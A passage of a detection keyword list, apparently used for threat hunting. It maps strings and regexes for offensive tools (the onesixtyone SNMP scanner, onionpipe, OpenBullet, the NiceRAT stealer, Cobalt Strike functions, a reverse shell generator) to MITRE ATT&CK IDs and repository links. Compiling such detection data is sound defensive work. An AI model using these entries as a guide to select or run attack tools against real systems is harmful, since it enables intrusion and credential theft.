*snmp_default_pass.txt*",".{0,1000}onesixtyone\s\-c\s.{0,1000}snmp_default_pass\.txt.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*onesixtyone -c *wordlists/*",".{0,1000}onesixtyone\s\-c\s.{0,1000}wordlists\/.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - 
?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*onesixtyone -i * -c*",".{0,1000}onesixtyone\s\-i\s.{0,1000}\s\-c.{0,1000}","offensive_tool_keyword","onesixtyone","Fast SNMP scanner. onesixtyone takes a different approach to SNMP scanning. It takes advantage of the fact that SNMP is a connectionless protocol and sends all SNMP requests as fast as it can. Then the scanner waits for responses to come back and logs them in a fashion similar to Nmap ping sweeps","T1046 - T1018","TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/trailofbits/onesixtyone","1","0","N/A","N/A","5","470","85","2023-04-11T18:21:38Z","2014-02-07T17:02:49Z" "*onesixtyone.1*",".{0,1000}onesixtyone\.1.{0,1000}","offensive_tool_keyword","onesixtyone","Fast SNMP scanner. onesixtyone takes a different approach to SNMP scanning. It takes advantage of the fact that SNMP is a connectionless protocol and sends all SNMP requests as fast as it can. Then the scanner waits for responses to come back and logs them in a fashion similar to Nmap ping sweeps","T1046 - T1018","TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/trailofbits/onesixtyone","1","1","N/A","N/A","5","470","85","2023-04-11T18:21:38Z","2014-02-07T17:02:49Z" "*onesixtyone.git*",".{0,1000}onesixtyone\.git.{0,1000}","offensive_tool_keyword","onesixtyone","Fast SNMP scanner. onesixtyone takes a different approach to SNMP scanning. It takes advantage of the fact that SNMP is a connectionless protocol and sends all SNMP requests as fast as it can. 
Then the scanner waits for responses to come back and logs them in a fashion similar to Nmap ping sweeps","T1046 - T1018","TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/trailofbits/onesixtyone","1","1","N/A","N/A","5","470","85","2023-04-11T18:21:38Z","2014-02-07T17:02:49Z" "*onionpipe --*",".{0,1000}onionpipe\s\-\-.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/cmars/onionpipe","1","0","N/A","10","5","449","29","2024-04-27T15:07:14Z","2022-01-23T06:52:13Z" "*onionpipe *.onion:*",".{0,1000}onionpipe\s.{0,1000}\.onion\:.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/cmars/onionpipe","1","0","N/A","10","5","449","29","2024-04-27T15:07:14Z","2022-01-23T06:52:13Z" "*onionpipe *:*~*",".{0,1000}onionpipe\s.{0,1000}\:.{0,1000}\~.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/cmars/onionpipe","1","0","N/A","10","5","449","29","2024-04-27T15:07:14Z","2022-01-23T06:52:13Z" "*onionpipe /run/*",".{0,1000}onionpipe\s\/run\/.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/cmars/onionpipe","1","0","N/A","10","5","449","29","2024-04-27T15:07:14Z","2022-01-23T06:52:13Z" "*onionpipe 8000*",".{0,1000}onionpipe\s8000.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe 
forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/cmars/onionpipe","1","0","N/A","10","5","449","29","2024-04-27T15:07:14Z","2022-01-23T06:52:13Z" "*onionpipe client new *",".{0,1000}onionpipe\sclient\snew\s.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/cmars/onionpipe","1","0","N/A","10","5","449","29","2024-04-27T15:07:14Z","2022-01-23T06:52:13Z" "*onionpipe/secrets*",".{0,1000}onionpipe\/secrets.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/cmars/onionpipe","1","0","N/A","10","5","449","29","2024-04-27T15:07:14Z","2022-01-23T06:52:13Z" "*onionpipe/tor*",".{0,1000}onionpipe\/tor.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/cmars/onionpipe","1","1","N/A","10","5","449","29","2024-04-27T15:07:14Z","2022-01-23T06:52:13Z" "*onionpipe-darwin-amd64-static*",".{0,1000}onionpipe\-darwin\-amd64\-static.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/cmars/onionpipe","1","1","N/A","10","5","449","29","2024-04-27T15:07:14Z","2022-01-23T06:52:13Z" 
"*onionpipe-linux-amd64-static*",".{0,1000}onionpipe\-linux\-amd64\-static.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/cmars/onionpipe","1","1","N/A","10","5","449","29","2024-04-27T15:07:14Z","2022-01-23T06:52:13Z" "*OnionScan*",".{0,1000}OnionScan.{0,1000}","offensive_tool_keyword","onionscan","OnionScan has two primary goals: We want to help operators of hidden services find and fix operational security issues with their services. We want to help them detect misconfigurations and we want to inspire a new generation of anonymity engineering projects to help make the world a more private place. Secondly we want to help researchers and investigators monitor and track Dark Web sites. In fact we want to make this as easy as possible. Not because we agree with the goals and motives of every investigation force out there - most often we don't. But by making these kinds of investigations easy. 
we hope to create a powerful incentive for new anonymity technology","T1589 - T1591 - T1596 - T1599","TA0011 - TA0012","N/A","N/A","Information Gathering","https://onionscan.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Online - Reverse Shell Generator*",".{0,1000}Online\s\-\sReverse\sShell\sGenerator.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*online_brute.gz.torrent*",".{0,1000}online_brute\.gz\.torrent.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","10","4","367","37","2023-03-17T22:45:29Z","2021-08-29T13:07:37Z" "*ookjlbkiijinhpmnjffcofjonbfbgaoc*",".{0,1000}ookjlbkiijinhpmnjffcofjonbfbgaoc.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*opcgpfmipidbgpenhmajoajpbobppdil*",".{0,1000}opcgpfmipidbgpenhmajoajpbobppdil.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*openBeaconBrowser*",".{0,1000}openBeaconBrowser.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - 
T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*openBeaconBrowser*",".{0,1000}openBeaconBrowser.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 
- TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*openBeaconConsole*",".{0,1000}openBeaconConsole.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*openBeaconConsole*",".{0,1000}openBeaconConsole.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - 
T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*openbsd_softraid2john.py*",".{0,1000}openbsd_softraid2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*OpenBullet.csproj*",".{0,1000}OpenBullet\.csproj.{0,1000}","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/openbullet","1","1","N/A","10","10","1426","688","2023-02-24T16:29:01Z","2019-03-26T09:06:32Z" "*OpenBullet.exe*",".{0,1000}OpenBullet\.exe.{0,1000}","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web 
Attacks","https://github.com/openbullet/openbullet","1","1","N/A","10","10","1426","688","2023-02-24T16:29:01Z","2019-03-26T09:06:32Z" "*OpenBullet.pdb*",".{0,1000}OpenBullet\.pdb.{0,1000}","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/openbullet","1","1","N/A","10","10","1426","688","2023-02-24T16:29:01Z","2019-03-26T09:06:32Z" "*OpenBullet.sln*",".{0,1000}OpenBullet\.sln.{0,1000}","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/openbullet","1","1","N/A","10","10","1426","688","2023-02-24T16:29:01Z","2019-03-26T09:06:32Z" "*OpenBullet.zip*",".{0,1000}OpenBullet\.zip.{0,1000}","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/openbullet","1","1","N/A","10","10","1426","688","2023-02-24T16:29:01Z","2019-03-26T09:06:32Z" "*openbullet/openbullet*",".{0,1000}openbullet\/openbullet.{0,1000}","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/openbullet","1","1","N/A","10","10","1426","688","2023-02-24T16:29:01Z","2019-03-26T09:06:32Z" "*OpenBullet2.Console.zip*",".{0,1000}OpenBullet2\.Console\.zip.{0,1000}","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/OpenBullet2","1","1","N/A","10","10","1565","446","2024-01-23T11:49:34Z","2020-04-23T14:04:16Z" 
"*OpenBullet2.Native.exe*",".{0,1000}OpenBullet2\.Native\.exe.{0,1000}","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/OpenBullet2","1","1","N/A","10","10","1565","446","2024-01-23T11:49:34Z","2020-04-23T14:04:16Z" "*OpenBullet2.Native.zip*",".{0,1000}OpenBullet2\.Native\.zip.{0,1000}","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/OpenBullet2","1","1","N/A","10","10","1565","446","2024-01-23T11:49:34Z","2020-04-23T14:04:16Z" "*OpenBullet2.zip*",".{0,1000}OpenBullet2\.zip.{0,1000}","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/OpenBullet2","1","1","N/A","10","10","1565","446","2024-01-23T11:49:34Z","2020-04-23T14:04:16Z" "*openbullet2:latest*",".{0,1000}openbullet2\:latest.{0,1000}","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/OpenBullet2","1","0","N/A","10","10","1565","446","2024-01-23T11:49:34Z","2020-04-23T14:04:16Z" "*OpenBullet2-master*",".{0,1000}OpenBullet2\-master.{0,1000}","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/OpenBullet2","1","1","N/A","10","10","1565","446","2024-01-23T11:49:34Z","2020-04-23T14:04:16Z" "*OpenBulletApp.cs*",".{0,1000}OpenBulletApp\.cs.{0,1000}","offensive_tool_keyword","openbullet","The OpenBullet web 
testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/openbullet","1","1","N/A","10","10","1426","688","2023-02-24T16:29:01Z","2019-03-26T09:06:32Z" "*OpenBulletCLI.csproj*",".{0,1000}OpenBulletCLI\.csproj.{0,1000}","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/openbullet","1","1","N/A","10","10","1426","688","2023-02-24T16:29:01Z","2019-03-26T09:06:32Z" "*OpenBulletCLI.exe*",".{0,1000}OpenBulletCLI\.exe.{0,1000}","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/openbullet","1","1","N/A","10","10","1426","688","2023-02-24T16:29:01Z","2019-03-26T09:06:32Z" "*openbullet-master*",".{0,1000}openbullet\-master.{0,1000}","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/openbullet","1","1","N/A","10","10","1426","688","2023-02-24T16:29:01Z","2019-03-26T09:06:32Z" "*openBypassUACDialog*",".{0,1000}openBypassUACDialog.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - 
T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*openBypassUACDialog*",".{0,1000}openBypassUACDialog.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" 
"*opencubicles/h8mail*",".{0,1000}opencubicles\/h8mail.{0,1000}","offensive_tool_keyword","h8mail","Powerful and user-friendly password hunting tool.","T1581.002 - T1591 - T1590 - T1596 - T1592 - T1217.001","TA0010","N/A","N/A","Information Gathering","https://github.com/opencubicles/h8mail","1","1","N/A","N/A","1","8","5","2019-08-19T09:46:33Z","2019-08-19T09:45:32Z" "*OPENCYBER-FR/RustHound*",".{0,1000}OPENCYBER\-FR\/RustHound.{0,1000}","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","Discovery","https://github.com/OPENCYBER-FR/RustHound","1","1","AD Enumeration","9","9","867","84","2024-03-14T08:53:31Z","2022-10-12T05:54:35Z" "*openGoldenTicketDialog*",".{0,1000}openGoldenTicketDialog.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*Opening PSEXEC shell at *",".{0,1000}Opening\sPSEXEC\sshell\sat\s.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*openKeystrokeBrowser*",".{0,1000}openKeystrokeBrowser.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*openPayloadGenerator*",".{0,1000}openPayloadGenerator.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - 
T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" 